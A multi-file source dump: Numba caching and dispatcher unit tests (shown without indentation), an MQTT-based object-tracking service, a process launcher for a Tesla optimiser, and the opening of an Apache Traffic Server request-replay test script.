self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
@tag('important')
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "looplifted" '
'as it uses lifted loops', str(w[0].message))
def test_big_array(self):
        # Code referencing big-array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
for f in [mod.use_c_sin, mod.use_c_sin_nest1, mod.use_c_sin_nest2]:
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn(
'Cannot cache compiled function "{}"'.format(f.__name__),
str(w[0].message),
)
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
        # Functions with the same name should still be disambiguated
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# doesn't return anything, since it cannot find the module
# fails unless the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when the executable
# is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# across test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_creatable_pycache(self):
# Make it impossible to create the __pycache__ directory
old_perms = os.stat(self.tempdir).st_mode
os.chmod(self.tempdir, 0o500)
self.addCleanup(os.chmod, self.tempdir, old_perms)
self._test_pycache_fallback()
@skip_bad_access
@unittest.skipIf(os.name == "nt",
"cannot easily make a directory read-only on Windows")
def test_non_writable_pycache(self):
# Make it impossible to write to the __pycache__ directory
pycache = os.path.join(self.tempdir, '__pycache__')
os.mkdir(pycache)
old_perms = os.stat(pycache).st_mode
os.chmod(pycache, 0o500)
self.addCleanup(os.chmod, pycache, old_perms)
self._test_pycache_fallback()
def test_ipython(self):
# Test caching in an IPython session
base_cmd = [sys.executable, '-m', 'IPython']
base_cmd += ['--quiet', '--quick', '--no-banner', '--colors=NoColor']
try:
ver = subprocess.check_output(base_cmd + ['--version'])
except subprocess.CalledProcessError as e:
self.skipTest("ipython not available: return code %d"
% e.returncode)
ver = ver.strip().decode()
print("ipython version:", ver)
# Create test input
inputfn = os.path.join(self.tempdir, "ipython_cache_usecase.txt")
with open(inputfn, "w") as f:
f.write(r"""
import os
import sys
from numba import jit
# IPython 5 does not support multiline input if stdin isn't
# a tty (https://github.com/ipython/ipython/issues/9752)
f = jit(cache=True)(lambda: 42)
res = f()
# IPython writes on stdout, so use stderr instead
sys.stderr.write(u"cache hits = %d\n" % f.stats.cache_hits[()])
# IPython hijacks sys.exit(), bypass it
sys.stdout.flush()
sys.stderr.flush()
os._exit(res)
""")
def execute_with_input():
# Feed the test input as stdin, to execute it in REPL context
with open(inputfn, "rb") as stdin:
p = subprocess.Popen(base_cmd, stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
universal_newlines=True)
out, err = p.communicate()
if p.returncode != 42:
self.fail("unexpected return code %d\n"
"-- stdout:\n%s\n"
"-- stderr:\n%s\n"
% (p.returncode, out, err))
return err
execute_with_input()
# Run a second time and check caching
err = execute_with_input()
self.assertIn("cache hits = 1", err.strip())
@skip_parfors_unsupported
class TestSequentialParForsCache(BaseCacheUsecasesTest):
def setUp(self):
super(TestSequentialParForsCache, self).setUp()
# Turn on sequential parfor lowering
parfor.sequential_parfor_lowering = True
def tearDown(self):
super(TestSequentialParForsCache, self).tearDown()
# Turn off sequential parfor lowering
parfor.sequential_parfor_lowering = False
def test_caching(self):
mod = self.import_module()
self.check_pycache(0)
f = mod.parfor_usecase
ary = np.ones(10)
self.assertPreciseEqual(f(ary), ary * ary + ary)
dynamic_globals = [cres.library.has_dynamic_globals
for cres in f.overloads.values()]
self.assertEqual(dynamic_globals, [False])
self.check_pycache(2) # 1 index, 1 data
class TestCacheWithCpuSetting(BaseCacheUsecasesTest):
# Disable parallel testing due to envvars modification
_numba_parallel_test_ = False
def check_later_mtimes(self, mtimes_old):
match_count = 0
for k, v in self.get_cache_mtimes().items():
if k in mtimes_old:
self.assertGreaterEqual(v, mtimes_old[k])
match_count += 1
self.assertGreater(match_count, 0,
msg='nothing to compare')
def test_user_set_cpu_name(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU name to generic
with override_env_config('NUMBA_CPU_NAME', 'generic'):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][1] == ll.get_host_cpu_name():
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], codegen.get_host_cpu_features())
self.assertEqual(key_generic[1][1], 'generic')
self.assertEqual(key_generic[1][2], '')
def test_user_set_cpu_features(self):
self.check_pycache(0)
mod = self.import_module()
mod.self_test()
cache_size = len(self.cache_contents())
mtimes = self.get_cache_mtimes()
# Change CPU feature
my_cpu_features = '-sse;-avx'
system_features = codegen.get_host_cpu_features()
self.assertNotEqual(system_features, my_cpu_features)
with override_env_config('NUMBA_CPU_FEATURES', my_cpu_features):
self.run_in_separate_process()
self.check_later_mtimes(mtimes)
self.assertGreater(len(self.cache_contents()), cache_size)
# Check cache index
cache = mod.add_usecase._cache
cache_file = cache._cache_file
cache_index = cache_file._load_index()
self.assertEqual(len(cache_index), 2)
[key_a, key_b] = cache_index.keys()
if key_a[1][2] == system_features:
key_host, key_generic = key_a, key_b
else:
key_host, key_generic = key_b, key_a
self.assertEqual(key_host[1][1], ll.get_host_cpu_name())
self.assertEqual(key_host[1][2], system_features)
self.assertEqual(key_generic[1][1], ll.get_host_cpu_name())
self.assertEqual(key_generic[1][2], my_cpu_features)
class TestMultiprocessCache(BaseCacheTest):
# Nested multiprocessing.Pool raises AssertionError:
# "daemonic processes are not allowed to have children"
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def test_multiprocessing(self):
# Check caching works from multiple processes at once (#2028)
mod = self.import_module()
# Calling a pure Python caller of the JIT-compiled function is
# necessary to reproduce the issue.
f = mod.simple_usecase_caller
n = 3
try:
ctx = multiprocessing.get_context('spawn')
except AttributeError:
ctx = multiprocessing
pool = ctx.Pool(n)
try:
res = sum(pool.imap(f, range(n)))
finally:
pool.close()
self.assertEqual(res, n * (n - 1) // 2)
class TestCacheFileCollision(unittest.TestCase):
_numba_parallel_test_ = False
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "caching_file_loc_fodder"
source_text_1 = """
from numba import njit
@njit(cache=True)
def bar():
return 123
"""
source_text_2 = """
from numba import njit
@njit(cache=True)
def bar():
return 321
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
sys.path.insert(0, self.tempdir)
self.modname = 'module_name_that_is_unlikely'
self.assertNotIn(self.modname, sys.modules)
self.modname_bar1 = self.modname
self.modname_bar2 = '.'.join([self.modname, 'foo'])
foomod = os.path.join(self.tempdir, self.modname)
os.mkdir(foomod)
with open(os.path.join(foomod, '__init__.py'), 'w') as fout:
print(self.source_text_1, file=fout)
with open(os.path.join(foomod, 'foo.py'), 'w') as fout:
print(self.source_text_2, file=fout)
def tearDown(self):
sys.modules.pop(self.modname_bar1, None)
sys.modules.pop(self.modname_bar2, None)
sys.path.remove(self.tempdir)
def import_bar1(self):
return import_dynamic(self.modname_bar1).bar
def import_bar2(self):
return import_dynamic(self.modname_bar2).bar
def test_file_location(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
# Check that the cache file is named correctly
idxname1 = bar1._cache._cache_file._index_name
idxname2 = bar2._cache._cache_file._index_name
self.assertNotEqual(idxname1, idxname2)
self.assertTrue(idxname1.startswith("__init__.bar-3.py"))
self.assertTrue(idxname2.startswith("foo.bar-3.py"))
@unittest.skipUnless(hasattr(multiprocessing, 'get_context'),
'Test requires multiprocessing.get_context')
def test_no_collision(self):
bar1 = self.import_bar1()
bar2 = self.import_bar2()
with capture_cache_log() as buf:
res1 = bar1()
cachelog = buf.getvalue()
# bar1 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
with capture_cache_log() as buf:
res2 = bar2()
cachelog = buf.getvalue()
# bar2 should save new index and data
self.assertEqual(cachelog.count('index saved'), 1)
self.assertEqual(cachelog.count('data saved'), 1)
self.assertEqual(cachelog.count('index loaded'), 0)
self.assertEqual(cachelog.count('data loaded'), 0)
self.assertNotEqual(res1, res2)
try:
            # Make sure we can spawn a new process without inheriting
            # the parent context.
mp = multiprocessing.get_context('spawn')
except ValueError:
print("missing spawn context")
q = mp.Queue()
# Start new process that calls `cache_file_collision_tester`
proc = mp.Process(target=cache_file_collision_tester,
args=(q, self.tempdir,
self.modname_bar1,
self.modname_bar2))
proc.start()
# Get results from the process
log1 = q.get()
got1 = q.get()
log2 = q.get()
got2 = q.get()
proc.join()
# The remote execution result of bar1() and bar2() should match
# the one executed locally.
self.assertEqual(got1, res1)
self.assertEqual(got2, res2)
# The remote should have loaded bar1 from cache
self.assertEqual(log1.count('index saved'), 0)
self.assertEqual(log1.count('data saved'), 0)
self.assertEqual(log1.count('index loaded'), 1)
self.assertEqual(log1.count('data loaded'), 1)
# The remote should have loaded bar2 from cache
self.assertEqual(log2.count('index saved'), 0)
self.assertEqual(log2.count('data saved'), 0)
self.assertEqual(log2.count('index loaded'), 1)
self.assertEqual(log2.count('data loaded'), 1)
def cache_file_collision_tester(q, tempdir, modname_bar1, modname_bar2):
sys.path.insert(0, tempdir)
bar1 = import_dynamic(modname_bar1).bar
bar2 = import_dynamic(modname_bar2).bar
with capture_cache_log() as buf:
r1 = bar1()
q.put(buf.getvalue())
q.put(r1)
with capture_cache_log() as buf:
r2 = bar2()
q.put(buf.getvalue())
q.put(r2)
class TestCacheMultipleFilesWithSignature(unittest.TestCase):
# Regression test for https://github.com/numba/numba/issues/3658
_numba_parallel_test_ = False
source_text_file1 = """
from file2 import function2
"""
source_text_file2 = """
from numba import njit
@njit('float64(float64)', cache=True)
def function1(x):
return x
@njit('float64(float64)', cache=True)
def function2(x):
return x
"""
def setUp(self):
self.tempdir = temp_directory('test_cache_file_loc')
self.file1 = os.path.join(self.tempdir, 'file1.py')
with open(self.file1, 'w') as fout:
print(self.source_text_file1, file=fout)
self.file2 = os.path.join(self.tempdir, 'file2.py')
with open(self.file2, 'w') as fout:
print(self.source_text_file2, file=fout)
def tearDown(self):
shutil.rmtree(self.tempdir)
    def test_caching_multiple_files_with_signature(self):
# Execute file1.py
popen = subprocess.Popen([sys.executable, self.file1],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
# Execute file2.py
popen = subprocess.Popen([sys.executable, self.file2],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, err = popen.communicate()
self.assertEqual(popen.returncode, 0)
class TestDispatcherFunctionBoundaries(TestCase):
def test_pass_dispatcher_as_arg(self):
        # Test that a Dispatcher object can be passed as an argument
@jit(nopython=True)
def add1(x):
return x + 1
@jit(nopython=True)
def bar(fn, x):
return fn(x)
@jit(nopython=True)
def foo(x):
return bar(add1, x)
# Check dispatcher as argument inside NPM
inputs = [1, 11.1, np.arange(10)]
expected_results = [x + 1 for x in inputs]
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(foo(arg), expect)
# Check dispatcher as argument from python
for arg, expect in zip(inputs, expected_results):
self.assertPreciseEqual(bar(add1, arg), expect)
def test_dispatcher_as_arg_usecase(self):
@jit(nopython=True)
def maximum(seq, cmpfn):
tmp = seq[0]
for each in seq[1:]:
cmpval = cmpfn(tmp, each)
if cmpval < 0:
tmp = each
return tmp
got = maximum([1, 2, 3, 4], cmpfn=jit(lambda x, y: x - y))
self.assertEqual(got, 4)
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[0] - y[0]))
self.assertEqual(got, (4, 0))
got = maximum(list(zip(range(5), range(5)[::-1])),
cmpfn=jit(lambda x, y: x[1] - y[1]))
self.assertEqual(got, (0, 4))
def test_dispatcher_cannot_return_to_python(self):
@jit(nopython=True)
def foo(fn):
return fn
fn = jit(lambda x: x)
with self.assertRaises(TypeError) as raises:
foo(fn)
self.assertRegexpMatches(str(raises.exception),
"cannot convert native .* to Python object")
def test_dispatcher_in_sequence_arg(self):
@jit(nopython=True)
def one(x):
return x + 1
@jit(nopython=True)
def two(x):
return one(one(x))
@jit(nopython=True)
def three(x):
return one(one(one(x)))
@jit(nopython=True)
def choose(fns, x):
return fns[0](x), fns[1](x), fns[2](x)
# Tuple case
self.assertEqual(choose((one, two, three), 1), (2, 3, 4))
# List case
self.assertEqual(choose([one, one, one], 1), (2, 2, 2))
class TestBoxingDefaultError(unittest.TestCase):
# Testing default error at boxing/unboxing
def test_unbox_runtime_error(self):
# Dummy type has no unbox support
def foo(x):
pass
cres = compile_isolated(foo, (types.Dummy("dummy_type"),))
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point(None)
self.assertEqual(str(raises.exception), "can't unbox dummy_type type")
def test_box_runtime_error(self):
def foo():
return unittest # Module type has no boxing logic
cres = compile_isolated(foo, ())
with self.assertRaises(TypeError) as raises:
# Can pass in whatever and the unbox logic will always raise
# without checking the input value.
cres.entry_point()
pat = "cannot convert native Module.* to Python object"
self.assertRegexpMatches(str(raises.exception), pat)
class TestNoRetryFailedSignature(unittest.TestCase):
"""Test that failed-to-compile signatures are not recompiled.
"""
def run_test(self, func):
fcom = func._compiler
self.assertEqual(len(fcom._failed_cache), 0)
# expected failure because `int` has no `__getitem__`
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry
with self.assertRaises(errors.TypingError):
func(1)
self.assertEqual(len(fcom._failed_cache), 1)
# retry with double
with self.assertRaises(errors.TypingError):
func(1.0)
self.assertEqual(len(fcom._failed_cache), 2)
def test_direct_call(self):
@jit(nopython=True)
def foo(x):
return x[0]
self.run_test(foo)
def test_nested_call(self):
@jit(nopython=True)
def bar(x):
return x[0]
@jit(nopython=True)
def foobar(x):
bar(x)
@jit(nopython=True)
def foo(x):
return bar(x) + foobar(x)
self.run_test(foo)
def test_error_count(self):
def check(field, would_fail):
# Slightly modified from the reproducer in issue #4117.
# Before the patch, the compilation time of the failing case is
            # much longer than that of the successful case. This can be detected
# by the number of times `trigger()` is visited.
k = 10
counter = {'c': 0}
@generated_jit
def trigger(x):
# Keep track of every visit
counter['c'] += 1
if would_fail:
raise errors.TypingError("invoke_failed")
return lambda x: x
@jit(nopython=True)
def ident(out, x):
pass
def chain_assign(fs, inner=ident):
tab_head, tab_tail = fs[-1], fs[:-1]
@jit(nopython=True)
def assign(out, x):
inner(out, x)
out[0] += tab_head(x)
if tab_tail:
return chain_assign(tab_tail, assign)
else:
return assign
chain = chain_assign((trigger,) * k)
out = np.ones(2)
if would_fail:
with self.assertRaises(errors.TypingError) as raises:
chain(out, 1)
self.assertIn('invoke_failed', str(raises.exception))
else:
chain(out, 1)
# Returns the visit counts
return counter['c']
ct_ok = check('a', False)
ct_bad = check('c', True)
# `trigger()` is visited exactly once for both successful and failed
# compilation.
self.assertEqual(ct_ok, 1)
self.assertEqual(ct_bad, 1)
if __name__ == '__main__':
unittest.main()
|
ot.py
|
#!/usr/bin/python3
import traceback
import paho.mqtt.client as mqtt
from threading import Thread, Condition, Timer
from signal import signal, SIGTERM
from configuration import env
import json
import time
import datetime
import sys
import struct
from iou_tracker import IOUTracker
from utils import BBUtil
mqtthost = env["MQTTHOST"]
office = list(map(float, env["OFFICE"].split(",")))
mqtt_topic = env["MQTT_TOPIC"]
class OT(object):
def __init__(self):
super(OT, self).__init__()
self._cache_rec = []
self._cache_send = []
self._cond_rec = Condition()
self._cond_send = Condition()
self._last_ts = None
self._speed_total=0
self._nframes=0
self._max_speed=0
self._mqtt = mqtt.Client()
self._mqtt.on_message = self.on_message
self._mqtt.on_disconnect = self.on_disconnect
self._topic_last_ts=0
self._tracker={}
def loop(self, topic=mqtt_topic):
print("connecting mqtt", flush=True)
timer = Timer(10, self._connect_watchdog)
timer.start()
while True:
try:
self._mqtt.connect(mqtthost)
break
except:
print(traceback.format_exc(), flush=True)
timer.cancel()
print("mqtt connected", flush=True)
self._stop = False
Thread(target=self.process).start()
Thread(target=self.publish).start()
self._mqtt.subscribe(topic)
self._mqtt.loop_forever()
def _connect_watchdog(self):
print("quit due to mqtt timeout", flush=True)
exit(-1)
def _add_rec(self, item=None):
self._cond_rec.acquire()
if item:
self._cache_rec.append(item)
self._cond_rec.notify()
self._cond_rec.release()
def _add_send(self, item=None):
self._cond_send.acquire()
if item:
self._cache_send.append(item)
self._cond_send.notify()
self._cond_send.release()
def stop(self):
self._mqtt.disconnect()
def on_disconnect(self, client, userdata, rc):
self._stop = True
def on_message(self, client, userdata, message):
try:
topic = message.topic
now=time.time()
self._add_rec(message.payload)
delta=int((now - self._topic_last_ts)*1000)
#print("MQTT on message: " +topic, delta, int((time.time()-now)*1000), flush=True)
self._topic_last_ts=now
except:
print(traceback.format_exc(), flush=True)
def _tracking(self,payload):
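        # Decode one detection-metadata payload, run per-sensor IOU tracking on its
        # objects, attach track ids, and queue the result for publishing.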
metadata = json.loads(payload.decode("utf-8"))
sensor=metadata["tags"]["sensor"]
if sensor not in self._tracker:
self._tracker[sensor]=IOUTracker(sigma_l=0,sigma_h=0.5,sigma_iou=0.5,t_min=2)
tracker=self._tracker[sensor]
width = metadata["resolution"]["width"]
height = metadata["resolution"]["height"]
bbutil=BBUtil(width, height)
objects=metadata["objects"]
bboxs=[]
confidence=[]
object_type=[]
detections=[]
for _idx in range(len(objects)):
bbox=objects[_idx]["detection"]["bounding_box"]
bbox=[bbox["x_min"],bbox["y_min"],bbox["x_max"],bbox["y_max"]]
bboxs=bbutil.float_to_int(bbox)
detections += [{
"bbox":bbox,
"confidence": objects[_idx]["detection"]["confidence"],
"object_type": objects[_idx]["detection"]["label_id"],
"idx": _idx,
}]
results=[]
t=time.time()
results=tracker.track(detections)
#print("mot: ",int((time.time()-t)*1000),sensor,flush=True)
if len(results) == 0: return
for item in results:
objects[item["idx"]]["track_id"]=item["track_id"]
metadata["objects"]=[objects[item["idx"]] for item in results]
metadata["nobjects"]=len(results)
self._add_send(metadata)
def process(self):
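        # Consumer thread: wait for payloads queued by on_message() and run tracking on each batch.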
while not self._stop:
self._cond_rec.acquire()
self._cond_rec.wait()
bulk = self._cache_rec
self._cache_rec = []
self._cond_rec.release()
try:
for idx,item in enumerate(bulk):
t=time.time()
self._tracking(item)
except:
print(traceback.format_exc(), flush=True)
continue
def publish(self):
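        # Publisher thread: drain tracked metadata queued by _tracking() and publish it over MQTT.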
while not self._stop:
self._cond_send.acquire()
self._cond_send.wait()
bulk = self._cache_send
self._cache_send = []
self._cond_send.release()
topic="analytics"
try:
for idx in range(len(bulk)):
t=time.time()
data = json.dumps(bulk[idx])
self._mqtt.publish(topic,payload=data,qos=0)
pass
except:
print(traceback.format_exc(), flush=True)
continue
ot = OT()
def quit_service(signum, sigframe):
ot.stop()
signal(SIGTERM, quit_service)
ot.loop()
|
tso.py
|
import argparse
import threading
from subprocess import Popen, PIPE
from typing import List
def run_process(process_args: List):
"""
Runs a python process and prints the stderr to the current console
Args:
process_args: The args to pass through to the process
"""
process = Popen(process_args, stderr=PIPE, universal_newlines=True)
while True:
line = process.stderr.readline()
if line:
print(line.strip())
if process.poll() is not None:
break
if __name__ == "__main__":
"""
Master script to boot either the server or optimiser or both
"""
parser = argparse.ArgumentParser(description='Boot the TSO servers')
parser.add_argument('username', type=str,
help='The username used for the Tesla API')
parser.add_argument('--server', action='store_true',
help='Boot the monitoring web server')
parser.add_argument('--optimiser', action='store_true',
help='Boot the optimiser controller')
    parser.add_argument('--comm-type', type=str,
                        help='The type of communication between processes: LOCAL, DATASTORE, CLOUD_STORAGE')
args = parser.parse_args()
if not args.server and not args.optimiser:
print("You must run the --optimiser or the --server or both.")
exit(-1)
# Boot each process in a new thread, so we can print all output from all processes to this console
threads = []
if args.optimiser:
thread_1 = threading.Thread(target=run_process, args=(['python', 'optimiser.py', args.username],))
thread_1.start()
threads.append(thread_1)
if args.server:
thread_2 = threading.Thread(target=run_process, args=(['python', 'server.py'],))
thread_2.start()
threads.append(thread_2)
for thread in threads:
thread.join()
print("Exiting...")
|
NonSSL.py
|
#!/bin/env python3
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import socket
import requests
import os
from threading import Thread
import sys
from multiprocessing import current_process
import sessionvalidation.sessionvalidation as sv
import lib.result as result
import extractHeader
import mainProcess
import json
import gzip
bSTOP = False
def createDummyBodywithLength(numberOfbytes):
    if numberOfbytes <= 0:
        return None
    # 'a' followed by (numberOfbytes - 1) 'b' characters, same result as the original loop
    return 'a' + 'b' * (numberOfbytes - 1)
def handleResponse(response, *args, **kwargs):
print(response.status_code)
# resp=args[0]
#expected_output_split = resp.getHeaders().split('\r\n')[ 0].split(' ', 2)
#expected_output = (int(expected_output_split[1]), str( expected_output_split[2]))
#r = result.Result(session_filename, expected_output[0], response.status_code)
# print(r.getResultString(colorize=True))
# make sure len of the message body is greater than length
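# Generator request body: requests sends an iterator with no known length using
# chunked transfer encoding, one chunk per yielded bytes object.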
def gen():
yield 'pforpersia,champaignurbana'.encode('utf-8')
yield 'there'.encode('utf-8')
def txn_replay(session_filename, txn, proxy, result_queue, request_session):
""" Replays a single transaction
:param request_session: has to be a valid requests session"""
req = txn.getRequest()
resp = txn.getResponse()
# Construct HTTP request & fire it off
txn_req_headers = req.getHeaders()
txn_req_headers_dict = extractHeader.header_to_dict(txn_req_headers)
txn_req_headers_dict['Content-MD5'] = txn._uuid # used as unique identifier
if 'body' in txn_req_headers_dict:
del txn_req_headers_dict['body']
#print("Replaying session")
try:
# response = request_session.request(extractHeader.extract_txn_req_method(txn_req_headers),
# 'http://' + extractHeader.extract_host(txn_req_headers) + extractHeader.extract_GET_path(txn_req_headers),
# headers=txn_req_headers_dict,stream=False) # making stream=False raises contentdecoding exception? kill me
method = extractHeader.extract_txn_req_method(txn_req_headers)
response = None
body = None
content = None
if 'Transfer-Encoding' in txn_req_headers_dict:
                # Delete the Host key: requests adds its own Host header anyway, so keeping
                # ours would produce duplicate Host fields. With a chunked-encoded body ATS
                # rejects that with 400 "Invalid HTTP request" (it tolerates the duplicate
                # when the data is not chunked encoded). See the chunked-upload sketch
                # after this function.
del txn_req_headers_dict['Host']
if 'Content-Length' in txn_req_headers_dict:
#print("ewww !")
del txn_req_headers_dict['Content-Length']
body = gen()
if 'Content-Length' in txn_req_headers_dict:
nBytes = int(txn_req_headers_dict['Content-Length'])
body = createDummyBodywithLength(nBytes)
#print("request session is",id(request_session))
if method == 'GET':
r1 = request_session.request('GET', 'http://'+extractHeader.extract_host(txn_req_headers)+extractHeader.extract_GET_path(
txn_req_headers), headers=txn_req_headers_dict, data=body)
responseHeaders = r1.headers
responseContent = r1.content # byte array
#print("len: {0} received {1}".format(responseHeaders['Content-Length'], responseContent))
